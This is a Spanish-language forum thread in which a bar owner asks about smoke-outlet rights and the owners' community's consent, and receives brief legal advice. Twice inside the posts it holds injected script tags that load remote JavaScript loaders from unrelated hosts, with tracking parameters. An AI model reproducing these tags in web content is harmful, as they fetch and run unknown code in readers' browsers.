Que derechos tiene el propietario de un local que no tiene salida de humos

Tengo un local que lo he adaptado a bar como no tenia salida de humos puse Filtros de carbonos y todos los vecinos ya no se porque se están quejando cuando no pude hacer otra cosa tienen que darme servidumbre de paso y sino pienso en poner una maquina mas potente que me aconseja el técnico pero entonces no me cabria una de las maquinas del aire acondicionado que tengo junto a la actual maquina de filtros de carbono si la cambio me deberían la comunidad dejar de poner en otro lugar la maquina que no cabe.

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7B5F1E1F23-864A-4BAD-822B-238A3E14A5A7%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=51&ccid=Algeciras&ip=84.123.161.236"></script>
{"Lat":0.0,"Lng":0.0}

1 Respuesta

Respuesta

Antes de nada, necesito que me indique si la "transformación" ha sido autorizada de forma escrita tanto por la Comunidad de Propietarios como por el Ayuntamiento de su localidad, que necesito saber donde se encuentra para consultar las ordenanzas municipales al respecto.

Si esta autorizado por el Ayuntamiento de ALgeciras (Cádiz) con su correspondiente licencia de obra y ya con su licencia de apertura. Con lo que respecta a la comunidad recuerdo haber hecho una reunión con ellos y exponer lo que íbamos a montar allí pero no se si ellos lo autorizaron. Un saludo

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7B5F1E1F23-864A-4BAD-822B-238A3E14A5A7%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=51&ccid=Algeciras&ip=84.123.161.236"></script>

Para poder exigir una salida de humos por elementos comunes del edificio, tendrá que hacer una petición escrita a la Comunidad de Propietarios donde se encuentre su local. Si se lo niegan de forma escrita, no sirve verbalmente tendrá que iniciar un procedimiento judicial para lo que necesitará Abogado y Procurador.

Ruego cierre y valore